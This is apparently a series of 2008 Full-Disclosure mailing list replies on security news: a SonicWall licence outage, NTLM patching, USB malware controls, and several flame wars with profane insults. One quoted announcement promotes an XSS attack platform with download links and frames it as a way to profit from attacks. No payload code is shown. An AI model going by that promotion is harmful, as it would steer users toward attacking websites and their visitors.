A nice compromise i wonder if it will work.. On Thu, Dec 4, 2008 at 5:23 AM, ghost [EMAIL PROTECTED] wrote: Hey mike, how about you stop playing moderator you fucking douche bag. I for one believe netdev brings alot to this list and encourage him and ureleet to continue posting. On Wed, Dec 3, 2008 at 9:47 PM, Mike C [EMAIL PROTECTED] wrote: Hye Guys, I though we had settled the issues offline. Lets restart our discussions.. this bickering is highly unnecessary on the list. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sonicwall license servers down .. all customers affected
I am sure Sonic wall is going to lose many customers and other companies should learn and not put DRM in their products. I hope this will teach them. On Tue, Dec 2, 2008 at 9:36 PM, Elazar Broad [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I stopped using SonicWall when I learned I had to purchase a whole new device for a customer that just wanted to add a few more machines to their network, instead of bumping the license like most normal vendors. On Tue, 02 Dec 2008 14:14:43 -0500 IT Security [EMAIL PROTECTED] wrote: Sonicwall (makers of various security products) has had their license manager (server) go haywire overnight and it's reset (meaning invalidated) the licenses on all of their email security products. This means customers can't login to their own systems (a good case against draconian DRM like this). Calls to support have gone straight to voicemail all morning, and no ETA for resolution yet exists. This is affecting **all** of their customers, as far as I can tell (and based on what I'm told by their general support ticket-taker). Their forum (probably requires registration) is full of complaints about it. Screenshots of it and other problem areas are available on request .. but I don't want to email them to this entire list). The first alert was these warnings : ~~ SonicWALL Email Security Alert (6.2.2.1071) ~~ [Summary: Your Email Security licenses have been reset.] Details: Host Name: **ourmailhost** Description: The Email Security licenses have been reset at 12/02/2008 04:18 EST. The email filtering will not be working. TimeStamp: LocalTime: Tue Dec 2 04:18:49 2008 GMT: Tue Dec 2 09:18:49 2008 Additional Information: Recommended Action: Please contact SonicWall Technical Support. A response from their technical support on the issue went like this : The issue is on our backend server who stores the registrations, some ES appliances got licences resetted. The exact cause is still being analized with high priority. In those cases entering the mysonicwall credentials or uploading file solve the issue. Kind Regards Ivan And as of now, their license server is **still** off-line : $ telnet licensemanager.sonicwall.com 443 Trying 204.212.170.143... telnet: Unable to connect to remote host: Connection refused DRM schemes like this only cause problems for the LEGITIMATE customers . -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAkk1jiwACgkQi04xwClgpZidpwP9EGnoiLpcTxqCI8uZn6IPZ5xNfSXs mFJBuV7+4DimJdh1Wr6XdevITM3XTvb56SqoLuKYXJTatlt5pExV16PqpCbNFTIGJl/x TjqFF2//M1GE0+02mfSpVFBTXAsji6chEWSM7KSk+4h/BGIpppc1bLC45JEscgrEWp4N OBvxfp8= =zRVw -END PGP SIGNATURE- -- Paying too much for your business phone system? Click here to compare systems from top companies. http://tagline.hushmail.com/fc/PnY6qxu9tWrxyM1PdHDmXgMv34TDO7Gvn9NbAdfSuL24iBSp0vlKw/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
The color system was made in order to give people a quick look at the terror scale. So to this can be something for us to have a quick look at the exploit scale. Remember these colors are for people in the IT industry and not for the average person. James On Mon, Dec 1, 2008 at 10:52 PM, n3td3v [EMAIL PROTECTED] wrote: Maybe he thinks the same as you and is making fun of the Department of Homeland Security, SANS Internet Storm Center etc. On Mon, Dec 1, 2008 at 4:27 PM, rholgstad [EMAIL PROTECTED] wrote: and how does making a color based on these inputs protect people? Mike C wrote: On Mon, Dec 1, 2008 at 4:21 AM, vulcanius [EMAIL PROTECTED] wrote: By the way, I also noticed that the new site for your project has the current threat level as yellow. Is it safe to assume that you've already got your metric systems in place and running? Yes, We do have a working framework for color code generation. The inputs to this function include *exploits released in the past week - The severity of the exploit - The application it was in - The language - estimated users of the software *The previous week's color *Localized nature of exploits. We cannot comment more on this until it is refined and standardized. If you are (or know) an antivirus vendor, please contact me offline to move ahead. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/movado-watches-on-sale ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Indian allegations alarm Pakistan
India was attacked the attackers came from Pakistan, I understand why Pakistan feels threatened however why would they attack Indian sites? On Sun, Nov 30, 2008 at 9:19 AM, Mike C [EMAIL PROTECTED] wrote: On Sun, Nov 30, 2008 at 11:11 AM, n3td3v [EMAIL PROTECTED] wrote: On Sun, Nov 30, 2008 at 5:25 AM, Mike C [EMAIL PROTECTED] wrote: On Sun, Nov 30, 2008 at 7:39 AM, Raj Mathur [EMAIL PROTECTED] wrote: On Sunday 30 Nov 2008, n3td3v wrote: Indian-Pakistan war is about to kick off folks... http://news.bbc.co.uk/1/hi/world/south_asia/7757031.stm I know it's not going to happen, but can I request you once again shut the fuck up about events that you have no clue about? At least try to keep your sensationalist retarded drivel to your own backyard. Although a knee-jerk reaction, this post has some value. The tensions between the countries is on the rise, and the recent blasts in Bangalore would increase the chances of war. BTW, does anyone have an idea on what kind of cyber-warfare is currently underway between the two nations? -- MC There was a report earlier in the week via pcworld.com, but I don't think its connected to this conflict, maybe just a coincidence: http://www.pcworld.com/businesscenter/article/154544/feuding_india_pakistani_hackers_deface_web_sites.html Thanks. I'm looking into this and will report on any further info. -- MC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anehta0.6.0 -- a new XSS Attack Platform!
I applaud the new tool however in reference on to what Mike said take a page out of HD Moore's book and make it something to help the community. On Wed, Nov 26, 2008 at 7:47 PM, Mike C [EMAIL PROTECTED] wrote: 2008/11/25 pst axis [EMAIL PROTECTED] Anehta is an open source XSS Attack Platform which is maintained by [EMAIL PROTECTED] Project Home: http://anehta.googlecode.com Demo Video: http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html Online Demo: http://www.secwiki.com/anehta Download: http://anehta.googlecode.com/files/anehta-v0.6.0fixed.zip It contains a javascript framework called anehta.js which is something like attackAPI to help hackers write XSS payloads easier, and more than that ,there is an administrative panel which implemented by PHP to help manage the clients. Many good ideas are included in anehta project, some of the ideas you might never seen before. You can really maximize your profits gained from XSS by lauching anehta. I'm not sure you should word it that way. While full-disclosure is the best way to security utopia, touting a tool for it's malicious use will only serve to provide fodder to those who are opposed to full-disclosure. HD Moore has handled this well with his framework. -- MC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!
I think in that effect they didn't feel they had to put the resources in to fix it because it wasn't worth the money. On Tue, Nov 25, 2008 at 11:11 AM, [EMAIL PROTECTED] wrote: On Tue, 25 Nov 2008 03:07:49 EST, Randal T. Rioux said: On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote: SSNNIIPP OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is interpreting this, this way? Really? When has releasing a solution to a problem 7 years later ever been acceptable? May not be acceptable, but it is standard practice with some software companies. That, plus Russ didn't even bother to read the fine article: And to be clear, the impact would have been to render many (or nearly all) customers' network-based applications then inoperable. For instance, an Outlook 2000 client wouldn't have been able to communicate with an Exchange 2000 server. I know the users Russ supports - we'd have needed a body bag for him if he had chosen that route rather than not cause a significant impact. This wasn't a buffer overflow, the problem was that the NTLM protocol was screwed up by design - and fixing a protocol bug is usually a *lot* more painful. If you read between the lines of the article, it appears that MS added support for a fixed protocol back in XP SP2, and has decided that the number of pre-SP2 systems out there talking to updated systems has grown small enough that it's finally practical to flip the switch. That's pretty much the only way to change a protocol without a flag-day cutover - ship dual-stack during a transition, and then flip the switch when few enough old-style machines are left. Let's face it - the number of systems that have gotten compromised via SMBRelay attacks is *far* smaller than the number of boxes pwned just because they have IE installed and a user at the keyboard. The number of systems pwned via SMBRelay is *also* a lot smaller than the number of boxes that would have broken if Microsoft had fixed things the way Russ apparently wanted them to. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/luxury-watch-safe ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Comment on: 2 engineers from China sentenced for espionage
I love FD! Where we get a full disclosure on the latest flame war :) On Tue, Nov 25, 2008 at 11:10 PM, n3td3v [EMAIL PROTECTED] wrote: Mike C On Mon, Nov 24, 2008 at 9:40 PM, Ureleet [EMAIL PROTECTED] wrote: name 1? On Mon, Nov 24, 2008 at 10:01 AM, n3td3v [EMAIL PROTECTED] wrote: On Mon, Nov 24, 2008 at 7:50 AM, Mike C [EMAIL PROTECTED] wrote: For what it's worth, i think the n3td3v groups feed is a bad idea because not many serious researchers have joined that group there are plenty of serious researchers on the group though they appear to be taking advantage of the feed instead of talking. all the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!
Only at the end, When there is a 0-day in the wild they will devote allot of man power in order to patch it. However in this case i don't understand why they decided to fix it now however it wasn't worth it to put a bunch of guys on it. On Tue, Nov 25, 2008 at 8:20 PM, Paul Schmehl [EMAIL PROTECTED]wrote: --On Tuesday, November 25, 2008 06:48:34 -0600 James Matthews [EMAIL PROTECTED] wrote: I think in that effect they didn't feel they had to put the resources in to fix it because it wasn't worth the money. That's a pretty ridiculous statement considering that they *did* put the resources into fixing it. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** Check the headers before clicking on Reply. -- http://www.astorandblack.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IRC Security Channels
Does that mean you don't want to give because you are going to go to jail or #nologin is the channel? On Tue, Nov 25, 2008 at 5:44 AM, [EMAIL PROTECTED] wrote: #nologin disque du hast blut ihm stuhl rembrandt ich gehe ins gefängnis disque träume werden wahr On Fri, Nov 21, 2008 at 2:55 PM, Trollie Fingers [EMAIL PROTECTED] wrote: After a week of mostly chatter I think we should have a productive thread. Security related IRC Channels. Would anyone mind sharing a list? Or collectively combining one. I'll start: irc.2600.net (hosts channels related to 2600 magazine.) -- Click for the best auto accessories at great prices. http://tagline.hushmail.com/fc/PnY6qxt6QWc6OZHJlVWmnobVDLWZO5f6LQJyeChtddkK8mNa5f67O/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/luxury-watch-safe ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Comment on: 2 engineers from China sentenced for espionage
We are seeing a disturbing amount of cyber attacks coming from china. On Sun, Nov 23, 2008 at 5:54 PM, Mike C [EMAIL PROTECTED] wrote: On Sun, Nov 23, 2008 at 4:16 AM, n3td3v [EMAIL PROTECTED] wrote: -- Forwarded message -- From: n3td3v [EMAIL PROTECTED] Date: Sat, Nov 22, 2008 at 10:33 PM Subject: Comment on: 2 engineers from China sentenced for espionage To: n3td3v [EMAIL PROTECTED] by n3td3v November 22, 2008 2:28 PM PST marcus sachs is doing a good job at keeping cyber security in the news to influence the next administration as it is coming in and 100 days after. http://youtube.com/watch?v=FSUPTZVlkyU http://news.cnet.com/8618-1001_3-10106100.html?communityId=2105targetCommunityId=2105blogId=92messageId=5045335tag=mncol;tback Hi n3td3v, Thanks for the update. Going by the recent history, I can see that there will be some comments deriding your posting, but there are those in the silent majority who appreciate the posts. -- MC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/luxury-insurance ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses
bit9 and kaspersky offer this new service. Companies should make use of it. On Sun, Nov 23, 2008 at 10:05 PM, Bipin Gautam [EMAIL PROTECTED]wrote: On 11/23/08, Mike C [EMAIL PROTECTED] wrote: Of course, blindly thwacking people / dragging them to HR by the hair when they're really just trying to do their jobs is counter-productive. The calls also show us where we, security, are falling down. Perhaps it's poor awareness training (if the user didn't know that they shouldn't run unapproved software, or why we have that rule, or how to get a new app approved); or could be that the official route is being seen as too slow or bureaucratic, in which case it needs fixing. And so on. All I hope is we can fix the issue. Hopefully in the near future. Yeah! Here is my prospective to a possible solution that wouldn't compromise usability. But, first lets all agree on banning execution of any binary from removable media is the only straightforward solution this decades old problem of virus infection/propagation from removable media. See, if a web-page tries to install an activeX / browser plugin, your browser (non intrusively) waits for user interaction with a security warning message on if you really intend to install the plugin (Which may be harmful!) or ...may choose to ignore the dialog and continue browsing. Here, it is assumed user understands the security impact of executing untrusted programs from internet and let the execution decision left to the end user with manual interaction. If the plugin installation behavior is not intended user can simply ignore the manual interaction request for execution and instead continue. In similar way, anti virus company or Microsoft should create similar for My Computer Zone where the first execution of a binary from removable media is denied by default and prompt for user interaction to execute, white listexecute or terminate/ban the request for execution from removable media like the way internet explorer (non intrusively) handles installation of activeX like in IE. Binary execution from removable media should be treated that way ( untrusted ! ) Pen drive / SD have unique serial numbers which can be used to identify and permanently whitelist or blacklist the media from execution. Windows already has a feature for prompting if user tries to execute binary from intranet/shared folder or execution of binary marked as downloaded from Internet Zone Why not have similar for binary execution from removable media as well!? What better could be the solution to stopping virus to propagate from removable medias with (default) FAT file system. (lacking ACL's) For corporate environment let there be feature to sync these white listed/blacklisted hashes of executable or removable media UID from anti virus server/domain controller to anti virus clients/related service running in user end. Will this work :)? -thanks, bipin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/luxury-insurance ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses
What i was referring to was having only programs on a corporate white list run. White listing services are provided by http://www.bit9.com/ and they have now partnered with Kaspersky to be able ID most programs and anything else run it in a sandbox. However your approach to blocking USB devices is better. But this is an overall approach. James On Mon, Nov 24, 2008 at 7:17 AM, Bipin Gautam [EMAIL PROTECTED]wrote: On 11/24/08, James Matthews [EMAIL PROTECTED] wrote: bit9 and kaspersky offer this new service. Companies should make use of it. what service, James! Could you please explain more... I find it ridicules to know that this problem has been there since the earliest version of windows but still without a generic solution! Is this unwillingness for the approach to a proper solution is what has fueled the antivirus business for so long? If you look in the *nix side you will see this technique is tested/proven. Signature based or behavior based approach detection will continue to fail. To address this never-ending problem of virus infection from removable media, i have implemented no-execution-from-removable to dorzons of computers in the past years, even the dumbest of users understand what is being done and feel safe about they wont likely have virus infection from the removable media ever, even if the media has a virus. They know workaround on how to temporarily disable the restriction if they are willing to run something trustworthy as i have made the users clear there is no solution to the problem of virus infection from removable media and and you have to learn these few things ...like you have learned to use antivirus software to stay safe. Users get it, really! Antivirus companies should take similar approach (as described previously) to address it but adding USABILITY. This problem is there to stay for years to come. What better could be the proper solution to this problem? thanks, -bipin On Sun, Nov 23, 2008 at 10:05 PM, Bipin Gautam [EMAIL PROTECTED]wrote: On 11/23/08, Mike C [EMAIL PROTECTED] wrote: Of course, blindly thwacking people / dragging them to HR by the hair when they're really just trying to do their jobs is counter-productive. The calls also show us where we, security, are falling down. Perhaps it's poor awareness training (if the user didn't know that they shouldn't run unapproved software, or why we have that rule, or how to get a new app approved); or could be that the official route is being seen as too slow or bureaucratic, in which case it needs fixing. And so on. All I hope is we can fix the issue. Hopefully in the near future. Yeah! Here is my prospective to a possible solution that wouldn't compromise usability. But, first lets all agree on banning execution of any binary from removable media is the only straightforward solution this decades old problem of virus infection/propagation from removable media. See, if a web-page tries to install an activeX / browser plugin, your browser (non intrusively) waits for user interaction with a security warning message on if you really intend to install the plugin (Which may be harmful!) or ...may choose to ignore the dialog and continue browsing. Here, it is assumed user understands the security impact of executing untrusted programs from internet and let the execution decision left to the end user with manual interaction. If the plugin installation behavior is not intended user can simply ignore the manual interaction request for execution and instead continue. In similar way, anti virus company or Microsoft should create similar for My Computer Zone where the first execution of a binary from removable media is denied by default and prompt for user interaction to execute, white listexecute or terminate/ban the request for execution from removable media like the way internet explorer (non intrusively) handles installation of activeX like in IE. Binary execution from removable media should be treated that way ( untrusted ! ) Pen drive / SD have unique serial numbers which can be used to identify and permanently whitelist or blacklist the media from execution. Windows already has a feature for prompting if user tries to execute binary from intranet/shared folder or execution of binary marked as downloaded from Internet Zone Why not have similar for binary execution from removable media as well!? What better could be the solution to stopping virus to propagate from removable medias with (default) FAT file system. (lacking ACL's) For corporate environment let there be feature to sync these white listed/blacklisted hashes of executable or removable media UID from anti virus server/domain controller to anti virus clients/related service running in user end. Will this work :)? -thanks, bipin
Re: [Full-disclosure] New hackers defacing the internets
Aww i was hoping for a new face on the block. On Tue, Nov 18, 2008 at 10:10 PM, [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Fred, Valdis' mustache and I have been following this group of hackers for a long time. As proof I offer a md5 hash[1] and url[2]. Thanks for your time, - -al [1] abcdefghijklmnopqrstuvwxyz [2] http://www.zone-h.net/defaced/2007/03/05/www.or-brun.com/ On Tue, 18 Nov 2008 14:34:33 -0500 Fredrick Diggle [EMAIL PROTECTED] wrote: Fredrick Diggle has recently noted an upswelling of defacement on the internet and believes it is worth noting. Most notably Matasano Security has apparently been owned and their popular internet blog replaced with a defacement page. http://www.matasano.com/log/ The group goes by a number of names including 404, 404 Bandits, 404 Not Found, and simply Not found. This is believed to be linked to terrorism and possibly communism. Other recent defacements of note include the following. http://www.google.com/404bandits http://www.foxnews.com/404 http://icanhascheezburger.com/notfoundbandits This could be the beginning of something bigger. If you notice anything suspicious please contact your local law enforcement agents. YAY! from Brazilia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkkjISsACgkQ8J2EGU1ixm4elAP5ASDWRJKwFSbKkwEcSgij3+Z37z7y VHJg26/M4hgRJg+jMETkbcikims6GWy/YOLj4Ghm/0dvnc1QxIwLvxBURSsKySDWwm5e Mn/qNaowMnm86WyYHFF1zlOunxu1tmZcQdP2Q0DGYQ5pL7Mzly5btQbgT3u0SGZNwSBm ncPyxio= =PbZ5 -END PGP SIGNATURE- -- Be a professional. Click here to earn a psychology degree. http://tagline.hushmail.com/fc/PnY6qxultlKH5H0821gblVTiF5wXhe1CevU95gPnrwPZp5iz0ytHi/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/luxury-insurance ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Speculation over back door in Skype
That would be boring and we like to have fun on FD On Tue, Nov 18, 2008 at 6:02 PM, [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Phil, Wouldn't English have been a better language for him to use than telepathy? On Tue, 18 Nov 2008 08:58:22 -0500 Phil Frederick [EMAIL PROTECTED] wrote: Uh, the date is at the top of the linked article. I think he's trying to say this is old news. Which it is. On Mon, Nov 17, 2008 at 2:39 PM, [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dearest Juha-Matti Laurio, Could you please point the community to your blog entry detailing the release date of this article? Thank-you for your service! -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkki5wQACgkQ8J2EGU1ixm4/4AP+MZARkiXNN5ngu+IOOEE/6KV0Yn2J cZ7/PnzLRqcObWhaRWbb2dRyj72eb8W7Axp+P59fHzoAEAa11flmii0/2qw/Z8DjDxRQ WqUhMgn3M9ziPSFQtJI1lbq7Q7gl9BcbTUaz1HEA7SGb6hegevKeigfOMd01pCh7/LVp BCZ57kA= =SwQN -END PGP SIGNATURE- -- Free information on becoming a Graphic Designer. Click Now! http://tagline.hushmail.com/fc/PnY6qxunKh93lvNYb44uxakBAOj2oak8jeLlhEDODHDf1fxp5Lezu/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/luxury-insurance ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fredrick Diggle has invited you to open a Google mail account
Wow free Gmail! I am signing up 10 times! On Wed, Nov 19, 2008 at 7:50 AM, rholgstad [EMAIL PROTECTED] wrote: yes a new gmail account is born every minute and I would like to claim another Salvador III Manaois wrote: is this one of those there's one born every minute kind of email? =) ...badz... bytes badz: http://badzmanaois.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IP-Adresses of German Secret Intelligence Agency supposedly leaked
HAHAHAH Now they are going to be pissed. They pass all these stupid surveillance laws and get away with it! L:et them have fun now... On Fri, Nov 14, 2008 at 7:30 AM, niclas [EMAIL PROTECTED] wrote: Don't know, if this is the right place for this kind of information. I also believe it's no big deal but you might want to scan your server logs for these addresses to see who's watching you. https://secure.wikileaks.org/wiki/T-Systems_BND_network_assignments%2C_13_Nov_2008 The PDF contains a list of ip-addresses which seem to be used by the german Bundesnachrichtendienst. Changes to german wikipedia pages committed by those addresses are listed here (german text): http://blog.datenritter.de/archives/393-angebliche-IP-Adressen-des-BND-und-Wikipedia-AEnderungen.html http://bastards22.vs8807.vserver4free.de/?p=170 German blogger Fefe knew about (some of) these adresses inn 2005 already and notice visits to his site. They were looking for cold fusion at home (kalte fusion zuhause) and muslim world outreach. http://blog.fefe.de/?ts=bc15908d n. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Malicious Code time-line 1980-2008
Wikipedia , virus.org On Thu, Nov 13, 2008 at 9:58 PM, David Omorogbe [EMAIL PROTECTED]wrote: Hi All, I am writing a research paper on malicious code time-line 1980-2008. The paper is about malious code history, but I want know if anyone know any resource that I can use. Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Attorneys for Palin email hacker: 'Don't call him hacker'
He should be called wikipedia reader! On Thu, Nov 13, 2008 at 10:26 PM, Trollie Fingers [EMAIL PROTECTED]wrote: Very interesting: *The terms hacker and hacking have no basis under the statute Kernell is accused of violating, a motion filed in US District Court in Knoxville argues. It goes on to seek an order forbidding prosecutors and their witnesses from using those words when referring to the case.* *Because of the negative connotations evoked by these terms, there is a significant danger of unfair prejudice, confusion of the issues, and misleading the jury, the motion states. Hackers are commonly portrayed as dangerous criminals who are involved in malicious conduct such as credit card fraud, stealing, intentional disruption of legitimate activities and causing economic damages.* Full article: http://www.theregister.co.uk/2008/11/13/palin_email_hacker_motions/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Cross Post] [Job Interview Guidance Request] Computer Forensics Officer
If you know the industry then you will be able to answer the questions. On Tue, Nov 11, 2008 at 9:58 AM, Aaron S. [EMAIL PROTECTED] wrote: Hi, I have an interview with a government agency for the post of Computer Forensics Officer. Has anybody had experience interviewing for a similar position? I would highly appereciate if anybody could give me an idea about what to expect in the interview. I have read through the forensic wiki and electronic evidence information center sites and other resources on the Internet. I just need some idea of what to expect in the interview. Thanks in advance. Aaron. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] question
The usual here these days. On Mon, Nov 10, 2008 at 12:54 AM, vulcanius [EMAIL PROTECTED] wrote: This is absolutely full of irony. On Sun, Nov 9, 2008 at 5:20 PM, n3td3v [EMAIL PROTECTED] wrote: are you one of those weirdos who tries to speak on behalf of an email list and when a question is emailed to you, you don't answer it and instead attempt to get the list to answer it on your behalf that you think you're representing the opinion of? On Sun, Nov 9, 2008 at 9:58 PM, waveroad waveroad [EMAIL PROTECTED] wrote: Ask this question to your psy. 2008/11/9, n3td3v [EMAIL PROTECTED]: what is your problem with me? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
